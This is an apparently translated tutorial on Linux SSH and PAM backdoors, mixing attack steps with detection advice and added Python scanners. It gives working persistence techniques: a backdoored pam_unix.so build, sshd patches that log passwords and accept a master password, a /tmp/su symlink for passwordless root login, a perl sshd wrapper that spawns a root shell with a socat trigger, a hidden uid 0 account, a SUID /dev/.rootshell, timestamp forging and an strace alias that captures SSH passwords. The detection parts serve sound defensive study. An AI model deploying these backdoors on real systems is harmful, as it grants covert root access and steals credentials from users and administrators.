Linux UserSpace Back-Door, Rootkit SSH/PAM Backdoor Attack And Defensive Technology

1. Security Offense and Defense Perspectives

0x1: For the Attacker

  • Use System Builtins to Simulate Rootkit Functionality. Stop relying on tools: "Master the environment.": be as unobtrusive as possible, i.e. disguise the rootkit as the system's own normal tools and behaviour
  • Everything Is A Weapon: wherever skill reaches, everything becomes a blade. For any feature of the operating system, once the right way of using and combining it is found, it can very likely form an intrusion vector

0x2: For the Defender

  • Know Your System, Before I Use It Against You. Think like an attacker: "Flip the evil bit."
  • Know Your Enemy: Know Your System: the battlefield of client-side offense and defense is mainly the operating system layer, but it also includes the modules that connect to the system, such as WEB and remote LOGIN; only by understanding their features (especially the high-performance and edge-case features) can targeted defenses be built
  • Effectiveness != Complexity: offense and defense is a holistic engineering project; a vulnerability in any one dimension can lead to a hacker intrusion, so it does not follow that kernel-level security matters more than application-level security: they are equally important. The effectiveness of an offensive or defensive technique does not have to be guaranteed by complexity

Relevant Link:

https://www.blacklodgeresearch.org/files/7613/6963/4840/Poor_Mans_Root_Kit_BLR_talk_PUBLIC_2013.pdf

2. SSH PAM Backdoor

PAM (Pluggable Authentication Module), put simply, provides a unified set of abstract interfaces for identity and password verification; application programmers use these APIs to implement security-related functions. PAM serves as the unified authentication entry point for Linux logins (including SSH), and for exactly that reason a hacker can use PAM to deploy a code-level logic backdoor for SSH.

0x1: Check the local PAM version

0x2: Download the matching source code

http://pkgs.fedoraproject.org/repo/pkgs/pam/Linux-PAM-0.99.6.2.tar.bz2/52844c64efa6f8b6a9ed702eec341a4c/
http://www.linux-pam.org/pre/history/
http://www.linux-pam.org/pre/library/

0x3: Back up the original PAM .so file

cd /lib64/security
ll pam_unix.so
mv pam_unix.so pam_unix.so.bak

0x4: Modify the source file and add the logic backdoor

cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix
vim pam_unix_auth.c

0x5: Recompile the PAM module

cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/
./configure
make

0x6: Replace the system's default PAM module with the one containing the logic backdoor

cp /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so

0x7: Test the backdoor

. Log in with the normal root account and password
. Log in covertly with the root account and the backdoor password (pam)

0x8: Detection and countermeasures

pam_unix is a native system module, so the RPM verification mechanism can be used to detect tampering

. CentOS: use rpm to verify whether an installed package has been modified
rpm -qV pam
....L.... c /etc/pam.d/fingerprint-auth
....L.... c /etc/pam.d/password-auth
....L.... c /etc/pam.d/smartcard-auth
....L.... c /etc/pam.d/system-auth
S.?...... /lib64/libpam.so.0.82.
S.?...... /lib64/libpam_misc.so.0.82.
S.....T. /lib64/security/pam_unix.so

Meaning of the output
/*
If everything verifies correctly there is no output at all. Any inconsistency is displayed. Output format:
1. An 8-character string: each character represents the comparison of one file attribute against the RPM database ("." means the check passed)
 1) S: file size
 2) M: mode (permissions and file type)
 3) 5: checksum (md5); ?: file unreadable
 4) D: device
 5) L: symbolic link
 6) U: user
 7) G: group
 8) T: file modification time
2. c: marks a configuration file
3. file name
*/

. Ubuntu
dpkg -V libpam-modules
???????? c /etc/security/limits.conf
???????? /lib/x86_64-linux-gnu/security/pam_unix.so

From a binary point of view, a .so file implanted with a code-level logic backdoor can be treated like a virus: by extracting the binary signature around the logic backdoor and adding it to the antivirus signature database, such backdoors can be detected and removed, and the module can be blocked from being loaded by ssh

. Extract a signature from the pam_unix.so that contains the logic backdoor
. Add it to the antivirus signature database
. Prevent the logic-backdoored pam_unix.so module from being loaded by the ssh process
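The following is an added example, not part of the original post: a small Python checker that parses `rpm -V` / `dpkg -V` output of the shape shown above and separates expected config-file changes (marked `c`) from modified non-config files such as pam_unix.so. The sample output strings are constructed in that shape, not captured from a real host; the ninth attribute position (P, capabilities) that newer rpm versions print is handled alongside the eight listed.

```python
import re
import subprocess
from dataclasses import dataclass

# Attribute flags in the field printed by `rpm -V` and `dpkg -V`
# (S size, M mode, 5 digest, D device, L link, U user, G group, T mtime, P capabilities).
FLAG_NAMES = {
    "S": "size", "M": "mode", "5": "digest", "D": "device", "L": "link",
    "U": "user", "G": "group", "T": "mtime", "P": "capabilities",
}
# Any of these on a non-config file means the installed file is no longer the packaged one.
CONTENT_CHANGES = {"size", "digest", "mode", "mtime"}

# flags, optional file-type letter (c = config, d = doc, ...), absolute path
LINE_RE = re.compile(r"^(?P<flags>[SM5DLUGTP.?]{8,9})\s+(?:(?P<ftype>[cdglr])\s+)?(?P<path>/\S+)")


@dataclass
class VerifyFinding:
    path: str
    changed: list       # attribute names that differ from the package database
    is_config: bool
    unverifiable: bool  # a '?' in the field: at least one attribute could not be checked


def parse_verify_output(text):
    """Parse the output of `rpm -V <pkg>` or `dpkg -V <pkg>` into findings."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:  # "missing" lines, warnings and blank lines are skipped
            continue
        flags = m.group("flags")
        findings.append(VerifyFinding(
            path=m.group("path"),
            changed=[FLAG_NAMES[ch] for ch in flags if ch in FLAG_NAMES],
            is_config=m.group("ftype") == "c",
            unverifiable="?" in flags,
        ))
    return findings


def tampered_binaries(findings):
    """Paths of non-config files whose content-related attributes differ from the package."""
    return [f.path for f in findings
            if not f.is_config and CONTENT_CHANGES.intersection(f.changed)]


def unverifiable_files(findings):
    """Paths where at least one check could not be performed (re-run as root, or use rpm -Vp)."""
    return [f.path for f in findings if f.unverifiable]


def verify_package(pkg, tool="rpm"):
    """Run the distribution's verifier for `pkg` and return (tampered, unverifiable)."""
    cmd = ["rpm", "-V", pkg] if tool == "rpm" else ["dpkg", "-V", pkg]
    out = subprocess.run(cmd, capture_output=True, text=True).stdout
    findings = parse_verify_output(out)
    return tampered_binaries(findings), unverifiable_files(findings)


# Constructed sample output in the shape shown above (not captured from a real host).
SAMPLE_RPM = """\
....L....  c /etc/pam.d/system-auth
S.?......    /lib64/libpam.so.0.82.0
S.5....T.    /lib64/security/pam_unix.so
"""
SAMPLE_DPKG = """\
??5?????? c /etc/security/limits.conf
??5??????   /lib/x86_64-linux-gnu/security/pam_unix.so
"""

if __name__ == "__main__":
    for name, sample in (("rpm", SAMPLE_RPM), ("dpkg", SAMPLE_DPKG)):
        f = parse_verify_output(sample)
        print(name, "tampered:", tampered_binaries(f), "unverifiable:", unverifiable_files(f))
```

A `?` in the digest position usually means rpm ran without permission to read the file. Because rpm, its database and the verified file all live on the same host, a rootkit that replaced rpm itself defeats this check; `rpm -Vp <package.rpm>` verifies against a pristine package file instead of the local database, and comparing digests against a known-good host is stronger still.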

Relevant Link:

http://www.csdn123.com/html/itweb/20130911/112822_112821_112829.htm
http://www.cnblogs.com/LittleHann/p/3662161.html
http://bobao.360.cn/learning/detail/454.html
http://www.awaysoft.com/taor/rpm%E6%A0%A1%E9%AA%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E5%8C%85%E6%98%AF%E5%90%A6%E8%A2%AB%E4%BF%AE%E6%94%B9.html

3. SSHD Backdoor

0x1: Check the SSH version

ssh -V
OpenSSH_7.2p2 Ubuntu-4ubuntu2., OpenSSL 1.0.2g Mar

0x2: Download the SSH source package

Download and modify the sshd source

vi includes.h                   // change the backdoor password and the log file locations

/*
+#define ILOG "/tmp/ilog" // records the usernames and passwords of logins to this host
+#define OLOG "/tmp/olog" // records the usernames and passwords used to log in from this host to remote hosts
+#define SECRETPW "123456654321" // the backdoor password
*/

0x3: Insert the backdoor logic

  • Use the configured backdoor password to log in, stepping straight over the authentication logic
  • Record the logins of root and other accounts, effectively a key logger

0x4: Restore the sshd_config file timestamp

touch -r sshd_config.bak ssh_config

0x5: Restart the service or reload the configuration

service sshd reload

0x6: Detection and countermeasures

  • Binary signature detection
    • Locate the target function dynamically through the ELF format
    • Inside the target function, use ClamAV's signature-database style of locating: [signature:offset:length]
  • Use the system's rpm to check the integrity of ssh
  • Check the program for characteristic strings; the logic-backdoor code deployed by hackers usually carries a characteristic string
  • Try logging in to ssh with an arbitrary password to check whether a "no-password logic backdoor" has been deployed, i.e. the hacker added a return statement directly into the decision logic that skips all password checks

Relevant Link:

http://www.freebuf.com/tools/10474.html
https://www.jianshu.com/p/b394528051c6

0x7: Using the configuration files of system service programs

Modify /etc/inetd.conf:

daytime stream tcp nowait /bin/sh sh –I

Replace inetd service programs such as in.telnetd and in.rexecd with * programs, redirecting the login program.

4. Information Gathering from $HOME/.ssh/known_hosts

The "$HOME/.ssh/" directory keeps the host's ssh login history in "known_hosts"; from that file an attacker can directly obtain DMZ/VPC hosts or the usual next-hop IPs.

Once a hacker controls a user's machine, reading known_hosts to gather information may reveal the next jump host, intranet or DMZ machines that the current host connects to, thereby widening the attack surface

Relevant Link:

https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf

5. SSH Session Hijacking without Re-Authentication


Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication

0x1: SSH multiplexing characteristics

Multiplexing is the ability to send more than one signal over a single line or connection.

With multiplexing, OpenSSH can re-use an existing TCP connection for multiple concurrent SSH sessions rather than creating a new one each time.

0x2:Setting Up Multiplexing

It must be understood that SSH hijacking takes place on the machine the hacker controls: through SSH hijacking the hacker hopes to obtain, without a password, the remote ssh sessions the current user connects to.

The configuration files the hacker needs to modify are those on the controlled user's machine.

1. Modify the ssh configuration [attacker has root privileges]

vim /etc/ssh/ssh_config
/*
..
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
..
*/

Once ControlMaster mode is enabled, if the current user has already logged in to the target machine once (for example a remote jump host or DMZ machine), the hacker can use Multiplexing to log in to that same server directly "without a password".

Put simply, SSH's password authentication operates at the level of the TCP connection, not at the session level; when Multiplexing is in use, the hacker's session bypasses any login authentication.


2. Modify the ssh configuration [attacker has no root privileges]

vim $HOME/.ssh/config
/*
..
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
..
*/

3. Modify the ssh configuration [wrap the ssh command in .bashrc]

vim $HOME/.bashrc
/*
..
ssh ()
{
/usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";
}
..
*/

This uses Bash's user-defined functions together with SSH's dynamic configuration options to turn on ControlMaster mode.

0x3: The attacker reuses the socket of a Multiplexing-mode session to make an SSH connection

This socket can be used to create further sessions, without credentials, even after the original user exits their session.

0x4: Detection and countermeasures

  • Check whether ControlMaster mode is enabled in the ssh configuration files
    • /etc/ssh/ssh_config
    • $HOME/.ssh/config
  • Check whether a user-defined bash function hijacks ssh()
    • set | grep -E '^ssh \(\)' (bash prints a function definition as `ssh () `, with a space, so grep "ssh()" alone misses it; `type ssh` also reports whether ssh is a function or an alias)
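Added example (not from the original post): a Python audit of the three ControlMaster settings in ssh_config-style text, plus a scan for leftover control sockets. The sample configs are constructed; the `%r@%h:%p` socket naming and the /tmp location follow the configuration shown above and are assumptions about what a hijacker would use.

```python
import os
import socket
import stat
import tempfile

# Values of ControlMaster that make ssh create or reuse a master socket.
MUX_ON = ("yes", "auto", "ask", "autoask")


def parse_ssh_config(text):
    """Return a list of (host_pattern, {option: value}) blocks from ssh_config text.

    Options that appear before the first Host/Match line are collected under '*'.
    """
    blocks = [("*", {})]
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        # ssh_config accepts both "Key value" and "Key=value"
        parts = line.replace("=", " ", 1).split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key in ("host", "match"):
            blocks.append((value, {}))
        else:
            blocks[-1][1][key] = value
    return blocks


def multiplexing_enabled(text):
    """Blocks whose ControlMaster setting turns multiplexing on, with the related options."""
    hits = []
    for pattern, opts in parse_ssh_config(text):
        cm = opts.get("controlmaster", "no").lower()
        if cm in MUX_ON:
            hits.append({
                "host": pattern,
                "controlmaster": cm,
                "controlpath": opts.get("controlpath"),
                "controlpersist": opts.get("controlpersist", "no"),
            })
    return hits


def find_control_sockets(directory):
    """Unix sockets in `directory` whose name looks like a user@host:port ControlPath."""
    found = []
    try:
        with os.scandir(directory) as it:
            for entry in it:
                try:
                    st = entry.stat(follow_symlinks=False)
                except OSError:
                    continue
                if stat.S_ISSOCK(st.st_mode) and "@" in entry.name:
                    found.append(entry.path)
    except OSError:
        return found
    return sorted(found)


# Constructed sample configs (not captured from a real host).
SAMPLE_GLOBAL = """\
Host *
    ControlPath /tmp/%r@%h:%p
    ControlMaster auto
    ControlPersist yes
"""
SAMPLE_CLEAN = """\
Host jump
    HostName 10.0.0.1
    ControlMaster no
"""


def self_check():
    """Create one constructed control socket in a temp dir and confirm the finder reports it."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, "root@10.0.0.1:22")
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(path)
    try:
        return [os.path.basename(p) for p in find_control_sockets(d)]
    finally:
        s.close()


if __name__ == "__main__":
    for cfg in ("/etc/ssh/ssh_config", os.path.expanduser("~/.ssh/config")):
        try:
            with open(cfg) as f:
                print(cfg, multiplexing_enabled(f.read()))
        except OSError:
            pass
    print("control sockets in /tmp:", find_control_sockets("/tmp"))
```

Run it against /etc/ssh/ssh_config and every user's ~/.ssh/config. For a socket the finder reports, `ssh -O check -S <socket> host` asks the master whether it is still alive, and `ssh -O exit -S <socket> host` shuts it down, which is the command a later section uses to clean up.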

Relevant Link:

https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Multiplexing
http://unix.stackexchange.com/questions/22965/limits-of-ssh-multiplexing
http://www.anchor.com.au/blog/2010/02/ssh-controlmaster-the-good-the-bad-the-ugly/
http://www.revsys.com/writings/quicktips/ssh-faster-connections.html

6. Hijacking Active SSH Screen Sessions

The scenario where user ssh_user manages ssh sessions with screen

When ssh_user runs

screen ssh root@112.124.20.20

to connect to the remote host "112.124.20.20", a corresponding file appears under /var/run/screen.

ls -la /var/run/screen/

The session can be taken over with screen -r root/

Injecting into a screen-managed ssh session has one drawback: the commands you type are displayed at the same time to the user who is currently connected, so it is easy to be discovered

0x1: Detection and countermeasures

  • Check whether /var/run/screen/ contains screen sessions; to some extent this counts as a suspicious event

Relevant Link:

http://0xthem.blogspot.com/2015/03/hijacking-ssh-to-inject-port-forwards.html
http://drops.wooyun.org/tips/5253

7. Dynamic tunnel in an existing SSH session

We can create a dynamic tunnel inside an existing master socket

lsof -i TCP:9090
ssh -O forward -D 9090 -S /tmp/root@112.124.20.20\:22 %h
lsof -i TCP:9090

This injected command sets up port forwarding; once it has run, port 9090 of this machine can be used as a SOCKS5 proxy to reach the next-hop network segment. No new TCP connection is created; the old ssh connection is reused, so this can be understood as an ssh tunnel.

As mentioned earlier, if ControlPersist is yes the socket file is not deleted automatically; we can remove /tmp/root@112.124.20.20\:22 manually with rm, or more gracefully use

ssh -O exit -S /tmp/root@112.124.20.20\:22 %h

8. A password-less ssh root backdoor via the ssh PAM authentication mechanism

0x1: Implementation

On the controlled server run the following command, which creates a symlink named su pointing to sshd.

ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort= &

Then open a new login session as root with any password: the login succeeds directly.

Note that the controlled server (the one on which the ssh backdoor is deployed) must be configured to "permit root login" and to "enable PAM authentication".

0x2: How it works

When a process named su starts, it triggers auth login verification (much like running su xxx on the command line), so the system reads the configuration in "/etc/pam.d/su".

Taking Ubuntu as an example,

root@iZuf651jh0tfb2bx32x9lpZ:~# cat /etc/pam.d/su
#
# The PAM configuration file for the Shadow `su' service
#

# This allows root to su without passwords (normal operation)
auth       sufficient pam_rootok.so

# Uncomment this to force users to be a member of group root
# before they can use `su'. You can also add "group=foo"
# to the end of this line if you want to use a group other
# than the default "root" (but this may have side effect of
# denying "root" user, unless she's a member of "foo" or explicitly
# permitted earlier by e.g. "sufficient pam_rootok.so").
# (Replaces the `SU_WHEEL_ONLY' option from login.defs)
# auth       required   pam_wheel.so

# Uncomment this if you want wheel members to be able to
# su without a password.
# auth       sufficient pam_wheel.so trust

# Uncomment this if you want members of a specific group to not
# be allowed to use su at all.
# auth       required   pam_wheel.so deny group=nosu

# Uncomment and edit /etc/security/time.conf if you need to set
# time restrainst on su usage.
# (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs
# as well as /etc/porttime)
# account    requisite  pam_time.so

# This module parses environment configuration file(s)
# and also allows you to use an extended config
# file /etc/security/pam_env.conf.
#
# parsing /etc/environment needs "readenv=1"
session       required   pam_env.so readenv=
# locale variables are also kept into /etc/default/locale in etch
# reading this file *in addition to /etc/environment* does not hurt
session       required   pam_env.so readenv= envfile=/etc/default/locale

# Defines the MAIL environment variable
# However, userdel also needs MAIL_DIR and MAIL_FILE variables
# in /etc/login.defs to make sure that removing a user
# also removes the user's mail spool file.
# See comments in /etc/login.defs
#
# "nopen" stands to avoid reporting new mail when su'ing to another user
session    optional   pam_mail.so nopen

# Sets up user limits according to /etc/security/limits.conf
# (Replaces the use of /etc/limits in old login)
session    required   pam_limits.so

# The standard Unix authentication modules, used with
# NIS (man nsswitch) as well as normal /etc/passwd and
# /etc/shadow entries.
@include common-auth
@include common-account
@include common-session

The key line is this one:

auth       sufficient pam_rootok.so

sufficient means that as soon as this line is satisfied, login success is returned directly.

The Linux man page's description of pam_rootok.so

Looking at the source of pam_rootok.so,

The key part (highlighted in the screenshot) is this: the module calls getuid(); if the uid obtained is 0, it additionally checks the SELinux condition (whether the check also yields 0 when SELinux is enabled); if so, it returns authentication success, otherwise authentication fails.

Under normal circumstances, when the root account runs su, password verification is skipped entirely; that is the intended purpose of this mechanism.

But here the attacker symlinks sshd to a process named su, and by borrowing sudo's password-less root verification mechanism achieves a password-less ssh backdoor.

Relevant Link:

https://www.freebuf.com/articles/system/138753.html

9. An sshd backdoor implemented in perl

0x1: Backdoor code

Back up the original "/usr/sbin/sshd" and replace it with the following perl script,

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
  • exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/): if the current STDIN file handle is a socket and the remote source port of that socket is 31334 (in big-endian network byte order the hex string is \x00\x00zf, which matches the perl regex ..zf), execute /bin/sh and end the current program (the second step is not executed); this amounts to handing a root shell (because sshd runs as root) to the remote socket
  • exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV: start the sshd service (/usr/bin/sshd is the real sshd); every argument passed to /usr/sbin/sshd (the backdoor) is passed on to the real sshd (this line ensures ordinary users can still use the ssh service normally; logins show nothing unusual)

0x2: Deploying the backdoor

# Move the real sshd to /usr/bin/sshd
mv /usr/sbin/sshd /usr/bin/sshd
# Place the backdoor sshd (the perl script) at /usr/sbin/sshd and make it executable
chmod +x /usr/sbin/sshd
# Restart the ssh service
/etc/init.d/ssh restart
# On the controlling end, run the following to initiate the backdoor connection:
socat STDIO TCP4:10.1.100.3:,sourceport=

This command redirects input and output to the socket 10.1.100.3: (the IP of the machine where the sshd backdoor is deployed), so STDIN in the backdoor perl script becomes a socket, and that socket's source port is 31334

# The command is equivalent to
socat -TCP4:10.1.100.3:,sourceport=

This obtains a system shell from the controlling end without any authentication (the root shell is spawned before the sshd authentication stage is ever reached), i.e. an ssh backdoor.

For better stealth, we can copy /bin/sh to /bin/sshd and change the backdoor source to:

#!/usr/bin/perl
exec"/bin/sshd"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

When the controlling end connects again and checks the network connections, a process named sshd is seen holding an open socket handle.
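Added example (not from the original post) covering the su-symlink technique of section 8 and the perl-script sshd of this section: three Python checks that ask whether what runs as, or sits at, sshd really is sshd. /proc/<pid>/exe resolves to the binary the kernel executed while /proc/<pid>/comm keeps the name it was started under, so sshd launched through /tmp/su is reported as (pid, "su", "/usr/sbin/sshd"); a symlink scan covers the temp directories; and an ELF-magic check catches an interpreter script installed in place of the binary. The self check builds a constructed /proc-style tree in a temp dir; the directory list and the /usr/sbin/sshd path are assumptions.

```python
import os
import tempfile

SSHD_BASENAME = "sshd"
# Directories where a symlink to sshd has no legitimate business (assumption; extend as needed).
SUSPECT_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def sshd_under_other_name(proc_root="/proc"):
    """(pid, comm, exe) for processes whose executable is sshd but whose name is not."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(pid_dir, "exe"))
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()
        except OSError:  # kernel threads, processes that already exited, or no permission
            continue
        if os.path.basename(exe) == SSHD_BASENAME and comm != SSHD_BASENAME:
            hits.append((int(entry), comm, exe))
    return sorted(hits)


def symlinks_to_sshd(dirs=SUSPECT_DIRS):
    """Symlinks in `dirs` whose target is an sshd binary, e.g. /tmp/su -> /usr/sbin/sshd."""
    hits = []
    for d in dirs:
        try:
            names = os.listdir(d)
        except OSError:
            continue
        for name in names:
            path = os.path.join(d, name)
            if os.path.islink(path):
                target = os.readlink(path)
                if os.path.basename(target) == SSHD_BASENAME:
                    hits.append((path, target))
    return sorted(hits)


def is_elf(path):
    """True when the file starts with the ELF magic; a perl or shell script does not."""
    try:
        with open(path, "rb") as f:
            return f.read(4) == b"\x7fELF"
    except OSError:
        return False


def _fake_proc_entry(proc_root, pid, comm, exe_target):
    """Build one /proc-style directory for the self check (constructed data, not a real host)."""
    pid_dir = os.path.join(proc_root, str(pid))
    os.makedirs(pid_dir)
    os.symlink(exe_target, os.path.join(pid_dir, "exe"))
    with open(os.path.join(pid_dir, "comm"), "w") as f:
        f.write(comm + "\n")


def self_check():
    """Exercise all three detectors against a constructed /proc tree and temp dir."""
    root = tempfile.mkdtemp()
    proc = os.path.join(root, "proc")
    _fake_proc_entry(proc, 100, "sshd", "/usr/sbin/sshd")   # normal daemon
    _fake_proc_entry(proc, 4242, "su", "/usr/sbin/sshd")    # sshd started through /tmp/su
    tmp = os.path.join(root, "tmp")
    os.makedirs(tmp)
    os.symlink("/usr/sbin/sshd", os.path.join(tmp, "su"))
    script = os.path.join(root, "sshd.pl")
    with open(script, "wb") as f:
        f.write(b"#!/usr/bin/perl\n")
    binary = os.path.join(root, "sshd.elf")
    with open(binary, "wb") as f:
        f.write(b"\x7fELF\x02\x01\x01" + b"\x00" * 9)  # constructed ELF header prefix
    return {
        "renamed": sshd_under_other_name(proc),
        "links": [(os.path.basename(p), t) for p, t in symlinks_to_sshd((tmp,))],
        "script_is_elf": is_elf(script),
        "binary_is_elf": is_elf(binary),
    }


if __name__ == "__main__":
    print("sshd running under another name:", sshd_under_other_name())
    print("symlinks to sshd in temp dirs:", symlinks_to_sshd())
    print("/usr/sbin/sshd is ELF:", is_elf("/usr/sbin/sshd"))
```

Pair the ELF check with the package verification from the PAM section: a script at /usr/sbin/sshd changes the file's size and digest, so `rpm -V openssh-server` or `dpkg -V openssh-server` flags it as well, and a second copy of the daemon at /usr/bin/sshd is a file the package never shipped.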


Relevant Link:

https://www.freebuf.com/articles/system/140880.html

10. Adding a system backdoor account

0x1: Windows $ hidden account

0x2: Adding a Linux root-level superuser

echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd

If the system does not allow users with uid=0 to log in remotely, an ordinary user account can be added instead

echo "mx7krshell::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

11. Permission-bit (SUID) backdoor

0x1: Plant a SUID shell

An ordinary user running /dev/.rootshell on this host obtains a root shell.

cp /bin/bash /dev/.rootshell
chmod u+s /dev/.rootshell
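Added example (not part of the original post) for sections 10 and 11: a Python audit that reads /etc/passwd-style text for extra uid 0 accounts and duplicate uids, and walks directories where no setuid binary belongs. The passwd text is constructed (it repeats the entry shown above); the directory list is an assumption, and the self check plants a constructed setuid file in a temp dir rather than touching /dev.

```python
import os
import stat
import tempfile

# Where a setuid binary is never expected (assumption; extend to the site's policy).
UNEXPECTED_SUID_DIRS = ("/dev", "/tmp", "/var/tmp", "/dev/shm", "/home")


def parse_passwd(text):
    """(name, uid, gid, home, shell) rows from /etc/passwd-style text; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            continue
        rows.append((parts[0], int(parts[2]), int(parts[3]), parts[5], parts[6]))
    return rows


def extra_root_accounts(text):
    """Account names other than 'root' whose uid is 0."""
    return [name for name, uid, *_ in parse_passwd(text) if uid == 0 and name != "root"]


def duplicate_uids(text):
    """uids shared by more than one account (any uid, not only 0)."""
    seen = {}
    for name, uid, *_ in parse_passwd(text):
        seen.setdefault(uid, []).append(name)
    return {uid: names for uid, names in seen.items() if len(names) > 1}


def find_suid_files(root_dirs=UNEXPECTED_SUID_DIRS):
    """Regular files with the setuid or setgid bit under the given directories."""
    hits = []
    for top in root_dirs:
        for dirpath, _dirnames, filenames in os.walk(top):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: do not follow symlinks planted in these dirs
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return sorted(hits)


# Constructed sample passwd content mirroring the entry added above (not from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mx7krshell:x:0:0::/:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""


def self_check():
    """Run the SUID scanner over a temp dir holding one constructed setuid file and one plain file."""
    d = tempfile.mkdtemp()
    planted = os.path.join(d, ".rootshell")
    with open(planted, "wb") as f:
        f.write(b"#!/bin/sh\n")
    os.chmod(planted, 0o4755)  # u+s, as in the command above
    benign = os.path.join(d, "note.txt")
    with open(benign, "w") as f:
        f.write("x")
    return [os.path.basename(p) for p, _mode, _uid in find_suid_files((d,))]


if __name__ == "__main__":
    with open("/etc/passwd") as f:
        text = f.read()
    print("extra uid 0 accounts:", extra_root_accounts(text))
    print("duplicate uids:", duplicate_uids(text))
    print("setuid files in unexpected places:", find_suid_files())
```

For a host-wide sweep, `find / -xdev -type f \( -perm -4000 -o -perm -2000 \)` produces the same list as the scanner over every filesystem, and the passwd checks should be repeated against /etc/shadow entries, since the shadow line shown above has no matching passwd entry at all.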

12. Linux environment variable backdoor

0x1: alias backdoor

In .bashrc under the current user's home directory:

alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
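Added example (not from the original post) serving both the bash `ssh()` function hijack of section 5 and the alias backdoor here: a Python scanner for shell startup files that reports functions and aliases shadowing watched commands, captures the function body, and lists which of the indicators seen on this page (ControlMaster options, strace, /tmp paths) the definition contains. The sample .bashrc is constructed from the two definitions shown on this page; the list of rc files and watched commands is an assumption.

```python
import os
import re

# Shell startup files to inspect for the current user (assumption: bash).
RC_FILES = ("~/.bashrc", "~/.bash_profile", "~/.profile", "~/.bash_aliases")
# Commands that handle credentials and are therefore worth watching for wrappers.
WATCHED = ("ssh", "scp", "sftp", "sudo", "su")
# Substrings that match the techniques shown on this page.
INDICATORS = ("ControlMaster", "ControlPath", "ControlPersist", "strace", "/tmp/")

# "name ()" or "function name" / "function name ()"
FUNC_RE = re.compile(r"^\s*(?:function\s+(?P<n1>[\w-]+)\s*(?:\(\s*\))?|(?P<n2>[\w-]+)\s*\(\s*\))")
ALIAS_RE = re.compile(r"^\s*alias\s+(?P<name>[^=\s]+)=(?P<body>.*)$")


def find_wrappers(text):
    """Function and alias definitions in rc-file text whose name is a watched command."""
    lines = text.splitlines()
    hits, i = [], 0
    while i < len(lines):
        line = lines[i]
        m = FUNC_RE.match(line)
        if m:
            name = m.group("n1") or m.group("n2")
            if name in WATCHED:
                # collect the body up to the line holding only the closing brace
                body, j = [line], i + 1
                while j < len(lines) and lines[j].strip() != "}":
                    body.append(lines[j])
                    j += 1
                if j < len(lines):
                    body.append(lines[j])
                hits.append({"line": i + 1, "kind": "function", "name": name, "text": "\n".join(body)})
                i = j + 1
                continue
        m = ALIAS_RE.match(line)
        if m and m.group("name").strip("'\"") in WATCHED:
            hits.append({"line": i + 1, "kind": "alias", "name": m.group("name").strip("'\""),
                         "text": line.strip()})
        i += 1
    return hits


def suspicious_indicators(text):
    """Which of the known indicators appear in a wrapper definition, in INDICATORS order."""
    return [marker for marker in INDICATORS if marker in text]


def scan_rc_files(paths=RC_FILES):
    """Apply find_wrappers to each existing rc file; unreadable files are skipped."""
    report = []
    for p in paths:
        full = os.path.expanduser(p)
        try:
            with open(full) as f:
                text = f.read()
        except OSError:
            continue
        for hit in find_wrappers(text):
            hit["file"] = full
            hit["indicators"] = suspicious_indicators(hit["text"])
            report.append(hit)
    return report


# Constructed sample .bashrc built from the two definitions shown on this page.
SAMPLE_BASHRC = """\
# constructed sample .bashrc
export EDITOR=vim
ssh ()
{
    /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";
}
alias ll='ls -l'
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
"""

if __name__ == "__main__":
    for hit in scan_rc_files():
        print(hit["file"], hit["line"], hit["kind"], hit["name"], hit["indicators"])
```

The scanner only reads files, so definitions sourced from elsewhere are missed; in a live shell `type -a ssh` shows every alias, function and binary bound to the name, and `declare -f ssh` prints the function body, which covers that gap.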